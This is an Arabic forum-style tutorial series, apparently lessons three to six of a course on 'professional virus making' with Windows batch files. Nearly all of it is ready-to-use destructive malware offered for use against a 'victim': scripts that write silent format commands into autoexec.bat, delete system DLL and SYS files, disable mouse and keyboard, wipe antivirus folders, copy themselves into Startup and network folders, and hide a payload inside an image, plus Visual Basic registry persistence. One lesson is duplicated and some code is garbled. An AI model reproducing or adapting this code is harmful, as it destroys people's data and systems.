2.الملف الذي انتقل الى WordPad اختر Package Object ثم Edit Package سوف تظهر لك نافذه بأسم Object Packager - Package in ******** اختر قائمة Edit ثم Copy Package ثالثا واخيرا اختر المجلد الذي به ملف EditServer ثم اضغط في المكان الفارغ على الزرار الايمن ثم اختر Paste (لصق) سوف يتكون لك ملف شكله غريب باسم Scrap وهذا |535| هوالملف قد تغير امتداده الى shs واذا ضغط عليه دبل كلك سوف تظهر لك صوره وسوف يشتغل ايضا ملف الباتش الذي دمجته مع الصوره والآن قد حصلت على باتش مرفق بصوره .
الامر Call يتصل في ملف معين اما الامر start يبدأ بتنفيذ امر او تشغيل برنامج
مثال (1) :

كود PHP:
call attrib -h -r c:autoexec.bat >nul

اخوي في هذا المثال استخدمنا الامر Call للاتصال في الملف autoexec و قمنا بتغير خصائصه
مثال (2) :

كود PHP:
start MSPaint

في هذا المثال امرنا بتشغيل برنامج الرسام اول ما يبدا الفيروس عمله
واريد المستخدم مثلا يضغط حرف y ويضغط enter وينفذ امر معين وn وenter يتنفذ امر اخر
اخي سوف اعطيك مثال عندما تقوم بالفورمات سوف يسألك الحاسب هل انت متأكد اجب بـ Y,N هنا نكتب هذا الايعاز لتجاهل الرسالة و الا اذ لم نكتب الايعاز سوف يظهر مثلا رسالة تقول للضحية سوف تقوم بحذف مجلد الوندوز هل انت متأكد من ذلك ... و اكيد سوف يجب بـ لا و هكذا لا يعمل الفيروس


(يتبع)

بسم الله الرحمن الرحيم
الفيروسات


الدرس الثالث




اليوم يا شباب راح انكمل دروس احتراف صناعة الفيروسات عن طريق المفات الدفاعية Batch Files المهم نحن بهذاك الدرس اتعلمنا بعض الايعزات و طريق تشفير و غير ذالك ... المهم هذا الدرس راح انطي امثلة عن العمل مع الملفات اخواني انا في هذه الدروس اعلمكم على كيفية التعامل مع الملفات الدفاعية لانه بعد التعلم سوف تقدر ان تصنع فيروسات بدون مساعدة من اي شخص و تصنعون فيروسات ة غير مكشوفة ان شاء الله
1-اوامر و امثلة :
del - Delete File
del c:\windows\*.txt
الشرح : لمسح ملف ما في هذا المثال قمنا بمسح كل ما يوجد في مجلد الوندوز

deltree - Delete Folder
deltree \y c:\windows
الشرح : لمسح ملف اي ليس له امتداد ملف هنا مسحنا ملف وندوز وليس ما بداخل الوندوز ملحوظة هامة هذا الامر لايعمل علي الاكس بي يعمل علي 98 اوك .
call - Open Or Call Another .bat File
call c:\windos\anything.bat
الشرح : هنا قمنا بأتصال مع ملف اخر لتحرير و مسح و نقل ...
cls - Clear The Screen
الشرح : هذا الامر من اجل تنظيف الشاشة من الاحرف
echo - Allows You To Write Anything
echo hahaha i will kill yr computer
الشرح : هذا الامر من احدى اجمل الايعازات و هو يجعل الضحية |596| يقرأ المكتوب مثلاً كتبة انا دمرتك يمكنه قرائته اي انه فقط لكتابة السطور
goto - To Go To a Nother Section In a Batch File
:start
echo i hack you
goto next
:next
del c:\windows\*.exe
الشرح : في هذا الامثال استخدمنا الامر go to يعمل على |554| الذهاب الى امر اخر لتنفيذه
copy %0 - To Copy The Running File To Another Place
copy %0 c:My********\anything.bat
الشرح : اما عن هذا الامر فهو مخصص لنسخ ملف copy

2.طريقة تغير امتداد Batch عن طريق Dos :
اذهب الى start اكتب command تفتح لك شاشة سوداء مكتوب فيها
cd:\windows
انت في هذه الحالة تكتب
..cd
كرر هذا الامر الى ان تجعلها
بعد ما تنتهي من هذا الامر تذهب الى my cumputer ثم تختار (:c)
وضع الفيروس |4| فية ثم اذهب الى الدوس و اكتب هذا الامر
cd:\>copy virus.exe virus.com
virus هو اسم الفيروس تبعك
وممكن تغير الامتداد الى com,scr,bat
ملاحظة :*** اخواني انا متأكد من الطريقة و مجربة و ناجحة 100% اكو شيء ثاني ليس تغير الامتداد بل منع مضادات الفيروسات من حذف الفيروس الطريقة سهلة جدا و ذكية في نفس الوقت كتالي :
انت مو كونت فيروس كويس اعمل التالي ادخل الى الدوس و ادخل الى ملف الفيروس فرضاً اسم الفيروسmoodax.bat اذن اكتب التالي :
ren moodax.bat ~moodax*<virus.bat
هذا الامر يمنع اي شخص من حذف الفيروس طبعاً السؤال اخواني انتظروا الدرس التالي للجواب لاكن من اجل العلم فقط لانه الوندوز ما يقبل علامات او اي شيء غير الاحرف و الارقام لاهذا سوف تحدث معركة بين الوندوز و المضاد علقناها
(يتبع)

بسم الله الرحمن الرحيم
الفيروسات


الدرس الثالث




اليوم يا شباب راح انكمل دروس احتراف صناعة الفيروسات عن طريق المفات الدفاعية Batch Files المهم نحن بهذاك الدرس اتعلمنا بعض الايعزات و طريق تشفير و غير ذالك ... المهم هذا الدرس راح انطي امثلة عن العمل مع الملفات اخواني انا في هذه الدروس اعلمكم على كيفية التعامل مع الملفات الدفاعية لانه بعد التعلم سوف تقدر ان تصنع فيروسات بدون مساعدة من اي شخص و تصنعون فيروسات ة غير مكشوفة ان شاء الله
1-اوامر و امثلة :
del - Delete File
del c:\windows\*.txt
الشرح : لمسح ملف ما في هذا المثال قمنا بمسح كل ما يوجد في مجلد الوندوز

deltree - Delete Folder
deltree \y c:\windows
الشرح : لمسح ملف اي ليس له امتداد ملف هنا مسحنا ملف وندوز وليس ما بداخل الوندوز ملحوظة هامة هذا الامر لايعمل علي الاكس بي يعمل علي 98 اوك .
call - Open Or Call Another .bat File
call c:\windos\anything.bat
الشرح : هنا قمنا بأتصال مع ملف اخر لتحرير و مسح و نقل ...
cls - Clear The Screen
الشرح : هذا الامر من اجل تنظيف الشاشة من الاحرف
echo - Allows You To Write Anything
echo hahaha i will kill yr computer
الشرح : هذا الامر من احدى اجمل الايعازات و هو يجعل الضحية |596| يقرأ المكتوب مثلاً كتبة انا دمرتك يمكنه قرائته اي انه فقط لكتابة السطور
goto - To Go To a Nother Section In a Batch File
:start
echo i hack you
goto next
:next
del c:\windows\*.exe
الشرح : في هذا الامثال استخدمنا الامر go to يعمل على |554| الذهاب الى امر اخر لتنفيذه
copy %0 - To Copy The Running File To Another Place
copy %0 c:My********\anything.bat
الشرح : اما عن هذا الامر فهو مخصص لنسخ ملف copy

2.طريقة تغير امتداد Batch عن طريق Dos :
اذهب الى start اكتب command تفتح لك شاشة سوداء مكتوب فيها
cd:\windows
انت في هذه الحالة تكتب
..cd
كرر هذا الامر الى ان تجعلها
بعد ما تنتهي من هذا الامر تذهب الى my cumputer ثم تختار (:c)
وضع الفيروس |4| فية ثم اذهب الى الدوس و اكتب هذا الامر
cd:\>copy virus.exe virus.com
virus هو اسم الفيروس تبعك
وممكن تغير الامتداد الى com,scr,bat
ملاحظة :*** اخواني انا متأكد من الطريقة و مجربة و ناجحة 100% اكو شيء ثاني ليس تغير الامتداد بل منع مضادات الفيروسات من حذف الفيروس الطريقة سهلة جدا و ذكية في نفس الوقت كتالي :
انت مو كونت فيروس كويس اعمل التالي ادخل الى الدوس و ادخل الى ملف الفيروس فرضاً اسم الفيروسmoodax.bat اذن اكتب التالي :
ren moodax.bat ~moodax*<virus.bat
هذا الامر يمنع اي شخص من حذف الفيروس طبعاً السؤال اخواني انتظروا الدرس التالي للجواب لاكن من اجل العلم فقط لانه الوندوز ما يقبل علامات او اي شيء غير الاحرف و الارقام لاهذا سوف تحدث معركة بين الوندوز و المضاد علقناها
(يتبع))

الدرس الرابع

للاحتراف بجد
المقدمة :
في الدروس السابقة قد قمت بطرح مفاهيم و شروحات لبعض منها ليس له علاقة في الدورة مثل طريقة التشفير و تغير الامتداد و الذكاء الفيروسي مع اني لم اعطي الا جزء منه ان هذا الدرس لا تحدث عن الذكاء الفيروسي لا كن نحن لا نستطيع صناعة فيروس ذكي عن طريق الملفات الدفاعية طبعاً لماذا اخواني يمكننا تطبيق خاصية الذكاء الفيروسي فقط في اللغات البرمجية و هذه التي ندرسها الان ليست لغة برمجية بتاتاً لاكنه احدى اهم مكونات نظم التشغيل الحديثة و القديمة !! و نسبة مستخدمي نظام النوافذ في العالم عددهم ليس بالقليل هذه الفيروسات التي نصنعها لا تعمل الا اذ كان هناك على الحاسب نظام دوس السبب لانه قد اشرنا في الدرس الاول في قسم المقدمة في الجزء الاول ((تعريف)) انه الملفات الدفاعية هي ليست الا حزمة من اوامر نظام التشغيل الدوس ...

1- الاكود الاكثر استخداماً :
في هذه الفقرة سوف اعطيكم كودات يستخدمه اغلب مبرمجي الفيروسات
1.هذا الكود لمنع كشف المضاد على الفايروس

كود PHP:
call attrib -h -r c:autoexec.bat >nul

------------------------------------
2.هذا الكود للفورمات

كود PHP:
echo format a: /q /u /autotest >nul >>c:autoexec.bat

------------------------------------
3.هذا كود للفورمات لكن بالختصار
echo & /autotest >nul >>c:\autoexec.bat ألاولى تعنى انسخ الامر القادم الى
(طبعاً معروف من الكود الاول انة الى الاوتواكسك)
الثانية تعنى اجراء وتنفيذ الامر بدون طلب تحذير بتاع
yes and NO
لأانك عارف لما تعمل فورمات لابد ان يحذرك الاول ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية اذن هذا الكود هو المسئول عن هذا ويعنى ايضا ان النسخ يكون الى ملف الاوتواكسيك فى السى
------------------------------------
4.هذا كود فورمات كل الاقراص |385|

كود PHP:
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat

------------------------------------
5.هذا كود فيروس العد التنازلي و علاجه :
الكود:
echo off@
shutdown -s اذا فتحت الفايروس راح يعد تنازلي من 30 ثانية ويطلع بدون رسالة اذا كنت تريد يطلع معاه رسالة وتوقيت غير
كود:
echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
echo off@
shutdown -s -t 15 -c "message" -m \\namecomputer طبعا نغير 15 الى عدد الثوان و message الى الرسالة ونغير namecomputer الى الجهاز المراد اغلاقه
العلاج :
shutdown –a
2-مجموعة من الكودات مع الشرح (المفصل) :
اما عن هذه الفقرة سوف اقوم بأعطائكم كودات لاكن مع شرح مفصل جداً
1 - اذ اردت كتابت كود فيروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست |391| اسمة مثلاً اكس
ملاحظة : يمكنك وضع اى كود dos غير الفورمات على هذة القاعدة

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى >nul >>c:autoexec.bat

والسطر الاخير يكرر ان كنت تريد اما اذا كانت العملية تتطلب الغاء رسالة تحذيرية فتكون القاعدة

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:autoexec.bat

مع تكرار السطر الاخير ان تتطلب ويمكنك وضع قاعدة مشتركة

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:autoexec.bat
echo كود دوسى >nul >>c:autoexec.bat

يعنى نفكر كدة انا كان الكود هاعترض رسالة فى احد السطور فلابد من اضافة /autotest لتفادى الرسالة التحذيرية
------------------------------------
2 - اذ اردت كتابت كود فايروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ملف تكست اسمة مثلاً اكس هل هذة الفكرة تعترضها رسالة تحذيرية
بالطبع لا اذن اتبع القاعدة الاولى يكون الكود كما يال
كود PHP:
ي
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del x.txt >nul >>c:autoexec.bat

التحليل
-------

كود PHP:
call attrib -h -r c:autoexec.bat >nul

ذكرنا انفاً الان لدخول الدريف والغاء ملف اسمة اكس(تكست مثلاً) فى الدوس كنت باتكتب
c:/ press enter فيتحول المحث |373| الى d:/ للاغاء هاتكتب
d:/Del x.txt press enter اذن معنا الكود الدوسى وقد قمنا بالعملية على كام خطوة على خطوتين اذن معنا الكود وعد الخطوات ومعنا الكود الاساسى للفيرس نستنتج التالى عدد سطر الكود لابد ان يكون
اثنين + واحد (اساسى) + اى عدد لو عاوز تكمل الفيرس لشىء تانى فيكون

كود PHP:
call attrib -h -r c:autoexec.bat >nul

(اساسى)

كود PHP:
echo d: >nul >>c:autoexec.bat

(الدخول على الدريف دى)

كود PHP:
echo Del x.txt >nul >>c:autoexec.bat

(الغاء ملف امسة اكس تكست)
تذكر :::::

كود PHP:
echo كود الدوس >nul >>c:autoexec.bat

------------------------------------
3 - اذ اردت الغاء كل الملفات التي امتدادها .txt في القرص

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.txt >nul >>c:autoexec.bat

------------------------------------
4 - اذ اردت الغاء كل الملفات التي امتدادها .zipفي القرص

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.zip >nul >>c:autoexec.bat

------------------------------------
5 - كود يقوم بالغاء ملفات النظام |300| و تحليله :

كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys

تحليلة :
c: دخلنا على السى

كود PHP:
cd %WinDir%System

دخلنا على ملف السيستم فى الوندوز

كود PHP:
deltree /y *.dll

الغاء كل ملفات الامتداد DLL. والتى هي خاص بالوندوز
cd\ خرجنا بعد تنفيذ العملية الاولى

كود PHP:
deltree /y *.sys

و الغاء كل ملفات sys. فى الوندوز.
هذا الكود كامل ما عدى كود التاريخ و انت تعرف انه لا استطيع صنع فيروس يعتمد على التاريخ عن طريق الملفات الدفاعية يعمل هذا الكود على ايقاف المضادات و فورمات C,D,E,F فقط و اذ اردت يمكنك الاضافة , و كود اعادة التشغيل اعتقد انه انت قرأت الدرس الثاني و الاول ...
كود:

كود PHP:
@Echo Virus Format
@Echo www.3asfh.comvb
@Echo By RBG-7
call attrib -h -r c:autoexec.bat >nul
format c: /q /u /autotest >nul >>c:autoexec.bat
format d: /q /u /autotest >nul >>c:autoexec.bat
format e: /q /u /autotest >nul >>c:autoexec.bat
format f: /q /u /autotest >nul >>c:autoexec.bat
shutdown -s
End

اتمنى انه يكون واضح ..
إقتباس:

كود PHP:
call attrib -h -r c:autoexec.bat >nul

Call : للاتصال في ملف من نوع Bat
Attrib : هذا امر خاص بالدوس يعمل على تغير خصائص ملف
-h : اخفاء
-r : جعله فقط قراءة
c:\autoexec.bat : الملف المراد التنفيذ عليه
> nul : هذا الامر شروح في الدرس الاول و يعمل على عدم سؤال المستخدم
إقتباس:

كود PHP:
format a: /q /u /autotest >nul >>c:autoexec.bat

Format : امر الفورمات
a: الامر يطبق على القرص A
/q : سريع
/u : يقوم بحذف الملفات الاساسية
/autotest : هذا الامر مهم جدا يقوم بنقل الكود المكتوب الى الملف المطلوب>nul >> : نقل من دون سؤال
c:\autoexec.bat : الملف الذي سوف يطبق به الكود
إقتباس:
echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
@echo off : عدم استخدام الامر Echo
اخوي البعض يسأل لمذا وضع هذا الامر في بعض الاحيان يخطاء المبرمج و يكتب الامر و بعده الكود مما يأدي الى القراءة فقط دون تنفيذshutdown -s : اطفاء الحاسب
-t : الوقت
30 : ثانية
-c : اظهار رسالة
message : اكتب الرسالة التي تريد
إقتباس:

كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys

نعم اخوي هذا كود كامل لفيروس تدمير النظام لا ينكتب في سطر واحد و السبب لانه كود كامل و ليس امر
انتهي الدرس ومني ليكم تحياتي نلتقي في الدرس القادم ...............................


(يتبع))))))))

الدرس الخامس
الدرس دا شرح عبارة عن اسئلة واجابة
1-اسئلة و حلول :

س1.كيف نستطيع عمل اعدة تشغيل عن الضغط على الفيروس
------------------------------------
عندما ضغط على الفيرس انتقلت اوامر الدوس الى ملف الاوتواكسك فلابد من اعادة التشغيل حتى يطلب الوندوز هذا الملف فيجدة وهو على الدوس فاينفذ الاور معتقداً انة يحمل
اوامر البدء ...
اضف هذا الكود لعمل ريستارت :

كود PHP:
c:windowsrundll.exe user.exe,exitwindowsexec

ألان عندما يضغط الضحية علية سوف يحدث وينتقل الاوامر الدوسية ومعها سطر الريستارت وهايحدث ريستارت
ويتم تنفيظ الاوامر الدوسيةفى سرعة كبيرة جدااىاننا اجبرنا الضحية على عمل ريستارت لكى يشتغل الفيرس
س2.هل هناك اكواد اخرى مثل عمل اغلاق للوندوز
------------------------------------

كود PHP:
c:windowsrundll32.exe user.exe,exitwindows

هذا كود الغلاق
س3.عندما اريد من الفيروس عدم حذف نفسه لماذا اكتب رموز (الدرس الثاني)
------------------------------------
لانه و قد ذكرة في الدرس السابق انه نظام التشغيل النوافذ (Windows)لا يقبل كتابة رموز في اسماء البرامج لاكن نظام التشغيل (MS-DOS)يوافق على كتابة هذه الاسماء .
س4.لماذا اقوم بتغير امتداد الفيروس من BAT الى EXE (الدرس الاول)
------------------------------------
لانه يمكن لاي شخص كشف الكود البرمجي للفيروس !! و هذا اكبر خطاً مما يؤدي الى استخادمه ضدك فيجب عليك الحذر ..
س5.لماذا اشفر الفيروس و لماذا لا تنص بكتابة كود تدمير المضدات (الدرس الثالث)
------------------------------------
لانه اذ قمت بكتابة الكود البرمجي الخاص بحذف او ايقاف عمل المضادات سوف يقوم المضاد بتنبيه الضحية و حذف الفيروس مباشرتاً مما يؤدي الى فشل العملية ...
س6.انت الان تعلمنا صناعة الفيروسات عن طريق الملفات الدفاعية اذن هل يوج مستى اقوى
------------------------------------
نعم,يوجد مستويات اقوى مثل الفيجول بيسك و السي بلص بلص و لغة التجميع لاكن من مميزات الملفات الدفاعية انه يمكن كتابة اي فيروس في اي حاسبة بدون برنامج معين او مترجم لغة فقط المفكرة ..
2-كودات فيروسات جاهزة :
1.فيروس عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز :

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll.exe user.exe,exitwindowsexec

------------------------------------
2.فيروس عمل فورمات C,D,E,F والطابعه :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat

------------------------------------
3.فيروس يحذف برنامج المفكرة وينسخ بدله برنامج اخر :

كود PHP:
del C:WINDOWSNOTEPAD.EXE
copy %0 C:WINDOWSNOTPAD.EXE

------------------------------------
4.فايروس افتراضي :

كود PHP:
@echo off
cls
:start
if exist c:AUTOEXEC.bat goto delc
if exist d:AUTOEXEC.bat goto deld
if exist e:AUTOEXEC.bat goto dele
if exist f:AUTOEXEC.bat goto delf
elc
del c:
goto end
eld
del d:
goto end
ele
del e:
goto end
elf
del f:
goto end
end

------------------------------------
5.فايروس النظام :

كود PHP:
@echo off
cls
:start
if exist c:windows goto next
if not exist c:windows goto copy
:next
del c:windows
goto end
:copy
cd c:
md virus
goto end
end

------------------------------------
6.فايروس الدوس :

كود PHP:
@echo off
C:WINDOWSrundll.exe mouse,disable
C:WINDOWSrundll.exe keyboard,disable
del c:command.com
del c:Io.sys
del c:Config.sys
del c:Msdos.sys
del c:windowssystem32command.com
deltree /y C:WINDOWSCOMMAND*.*
deltree /y C:WIN98COMMAND*.*
deltree /y C:WINmeCOMMAND*.*
deltree /y C:WIN_meCOMMAND*.*
deltree /y C:WINxpCOMMAND*.*
deltree /y C:WIN_xpCOMMAND*.*
del d:command.com
del d:Io.sys
del d:Config.sys
del d:Msdos.sys
del d:windowssystem32command.com
deltree

------------------------------------
7.فيروس قاتل ملفات السستم :

كود PHP:
@echo off
c:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
c:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
CLS

------------------------------------
8.فيروس قاتل الفأرة و لوحة المفاتيح :

كود PHP:
@echo off
C:WINDOWSrundll.exe mouse,disable
C:WINDOWSrundll.exe keyboard,disable
copy key.BAT C:WINDOWSstartm~1programsstartup
copy key.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy key.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
CLS
(يتبع)

9.فيروس يمنع استخدام خصائص الشاشة :

كود PHP:
@echo off
cd
cd
deltree /y c:/windows/RUNDLL32.exe
cd
cd

------------------------------------
10.فيروس تدمير سطح المكتب :

كود PHP:
@echo off
cd
cd
deltree /y c:/windows/desktop
cd
cd

------------------------------------
11.فيروس قاتل النورتن :

كود PHP:
@echo off
%WinDir%rundll.exe mouse,disable
%WinDir%rundll.exe keyboard,disable
copy hahahah.BAT %windir%startm~1programsstartup
copy hahahah.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy hahahah.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
deltree /y c:progra~1norton~1*.*
deltree /y d:progra~1norton~1*.*
deltree /y c:progra~1zonela~1*.*
deltree /y d:progra~1zonela~1*.*
cls

------------------------------------
12.فيروس التدمير :

كود PHP:
echo off@
c:windowsrundll.exe mouse,disable
c:windowsrundll.exe keyboard,diable
goto del
el
deltree y c:*.*
goto copy
:copy
copy %0 C:WINDOWSStart MenuProgramsStartUpname of virus.bat
cls
puse

------------------------------------
13.فيروس يمحى جميع الملفات التى على الهارد :

كود PHP:
@echo off
c:
cd
deltree /y *.*
d:
cd
deltree /y *.*

------------------------------------
14.فيروس خاص :

كود PHP:
echo off@
del system.ini
del win.ini
del auto exec.bat
del config.sys

------------------------------------
15.اهم فايروس فايروس مدمر :

كود PHP:
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat

------------------------------------
16.فيروس عمل فورمات للجهاز فورا :

كود PHP:
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y c:progra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat

------------------------------------
17.فيروس قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز :

كود PHP:
call attrib -h -r c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys

------------------------------------
18.فيروس قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره

كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys

------------------------------------
19.فيروس عمل فورمات C,D,E,F والطابعه وقفل الجهاز :

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll32.exe user.exe,exitwindows

------------------------------------
20.فيروس النسخ الالي :

كود PHP:
@echo off
:start
cls
copy %0 c:/virusautocopy.bat
copy %0 c:/windows/virusautocopy.bat
copy %0 d:/virusautocopy.bat
copy %0 c:/My ********s/virusautocopy.bat
end

------------------------------------
21.فايروس ينسخ نفسة في network و ملفات winzip و start up ( اهم فيروس – ) :

كود PHP:
send msg to any one onlin in the network and start many programs
del all c files and copy it self in any dirve
if exist d:
copy %0 d:game.bat
copy %0 d:autoexec.bat
@echo off
echo Virus Name:A7meedye
c:windowsrundll.exe mouse,disable
c:windowsrundll.exe keyboard,disable
goto network
:network
cls
if exist c:winnt goto winnt
copy %0 c:windowsalluse~1applic~1Network89.bat
copy %0 c:windowsalluse~1destkopNetwork89.bat
copy %0 c:windowsalluse~1startm~1Network89.bat
copy %0 c:windowsalluse~1startm~1progra~1Network89.ba t
goto zip
zip:
cls
@dir /s /b /l c:winzip32.exe | set wz=
@FOR /F "delims==" %%y IN ('dir /s /b /l c:\*.zip') DO @echo "%wz%" -min -a -r -p "%%y"
goto startup
startup:
cls
copy %0 C:WINDOWSStart MenuProgramsStartUpNetwork89.bat
goto del
del:
deltree /y C:WINDOWS*.*
deltree /y C:Program Files*.*
deltree /y C:My ********s*.*
goto msg
msg:
NET SEND 127.0.0.1 you got a virus
goto start
:start
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad

goto end
:end
cls
echo Im fuck your computer
echo sorry about what my virus do but you are stuped
echo The Virus Made By A7meedye
puse
(هاد الشرح يتبع للدرس الخامس)))))))))))))))))))

الدرس السادس
الدرس دا مهم جدا
اخواني الاعزاء هذا الدرس يعتبر خاص في الدورة لانه عندما طرحة الدورة لقد نسيت بعض الاشياء المهمة و يجب علي اكمالها و ان شاء الله في هذا الدرس سوف ابري ذمتي من اجل اكمال الدورة .
1.طريقة تشغيل الفيروس عند بدا التشغيل :
سوف نستخدم لغة الفيجول بيسك و يجب على الشخص الذي يريد استخدام الكود لديه مستوى و لو فوق الوسط ليعرف وضع الكودات على كلاً يوجد كتاب و دورة الاستاذ الصقر الجراح يمكن من خلاالها تعلم الفيجول بيسك و انا انصح به المهم الان سوف اعطيكم الكودات و مناطق وضعها اما عن كيفية دمج الفيروس مع الفيجول فراجعوا الدرس الاول لمعرفة الطريقة الكاملة .


كود PHP:
كود بدا التشغيل :
في الموديل :
Option Explicit
Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Any, phkResult As Long, lpdwDisposition As Long) As Long
Private Const READ_CONTROL = &H20000
Private Const KEY_QUERY_VALUE = &H1
Private Const KEY_SET_VALUE = &H2
Private Const KEY_CREATE_SUB_KEY = &H4
Private Const KEY_ENUMERATE_SUB_KEYS = &H8
Private Const KEY_NOTIFY = &H10
Private Const KEY_CREATE_LINK = &H20
Private Const KEY_READ = KEY_QUERY_VALUE + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + READ_CONTROL
Private Const KEY_WRITE = KEY_SET_VALUE + KEY_CREATE_SUB_KEY + READ_CONTROL
Private Const KEY_EXECUTE =
KEY_READ
Private Const KEY_ALL_ACCESS = KEY_QUERY_VALUE
+ KEY_SET_VALUE + KEY_CREATE_SUB_KEY
+ KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY
+ KEY_CREATE_LINK + READ_CONTROL
Private Const RunPath = "Software\Microsoft\Windows\CurrentVersion\Run \"
Private Const HKLM =
&H80000002
' استخدم الامر التالي لالغاء التشغيل التلقائي Public Sub DoNotRun(ProgramName
As String) Dim hKey As Long Dim Ret
As Long ' فتح
المفتاح المطلوب Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS,
hKey) ' حذفها من
مسجل النظام. Ret =
RegDeleteValue(hKey, ProgramName) ' إغلاق
المفتاح RegCloseKey hKey End
Sub Public Sub RunWhenStartup(ProgramName
As String, ProgramPath As
String) Dim hKey
As Long Dim Ret As Long ' فتح
المفتاح المطلوب Ret =
RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey) '
إنشاء قيمة جديدة بإسم
البرنامج وعنوانه. Ret =
RegSetValueEx(hKey,
ProgramName, 0&, 1,
ProgramPath, Len(ProgramPath)) 'LenB(StrConv(TheData,
vbFromUnicode)) +
1) '
إغلاق المفتاح RegCloseKey hKey End Sub ------------ في
الفورم : RunWhenStartup "عنوان",
App.Path & "" &
App.EXEName & ".exe" <
/FONT
>

2.كيفية التبليغ : (فقط في الشبكات)
اعرف جيد جدا انه لا يوجد فيروس في العالم يحوي شيء اسمه تبليغ لاكن بعد الان سوف يوجد نعم اخواني هذه الطريقة المجربة و لا يوجد به اي خطا كود بسيط يعادل الف برامج قراصنة الانترنيت كل ما علينا فعله هو اضافة هذا السطر الى كود الفيروس مع تغير بعض الاشياء كاتالي :

كود:

كود PHP:
NET SEND 127.0.0.1 Run Virus Now

